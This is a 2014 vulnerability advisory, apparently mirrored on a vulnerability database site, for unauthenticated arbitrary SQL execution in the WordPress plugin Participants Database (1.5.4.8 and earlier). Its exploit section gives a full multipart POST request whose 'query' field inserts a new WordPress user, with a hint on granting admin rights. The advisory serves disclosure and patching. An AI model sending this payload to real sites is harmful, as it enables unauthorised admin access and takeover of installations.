Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30852
HistoryJun 14, 2014 - 12:00 a.m.

Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

2014-06-1400:00:00
vulners.com
12
JSON

Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/advisories/1

— Info —

Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.

— Vulnerability details —

  1. If any of the shortcodes is used (e.g. signup page) then it is
    possible for anonymous (unauthenticated) users to trigger some
    administrative actions.

  2. The action "export CSV" takes a parameter called "query" that can
    contain an arbitrary SQL query. This means that an unauthenticated
    user can execute arbitrary SQL statements (e.g. create an admin user,
    read or write files, or execute code depending on the MySQL user
    privileges).

— Exploit —

Add a user to wordpress as follows (if you want an admin user, add
admin privileges to wp_usermeta):

POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN

------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"

output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"

participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"

participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"

INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES (31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);

------WebKitFormBoundaryuoACADe1C2IFWMxN

— Solution —

This issue has been fixed in version 1.5.4.9. Download the newest version from:

https://wordpress.org/plugins/participants-database/

— Credit —

Yarubo Research Team
research [at] yarubo.com

Network Security Scan:
http://www.yarubo.com/

Free Heartbleed Scan:
http://www.yarubo.com/heartbleed

JSON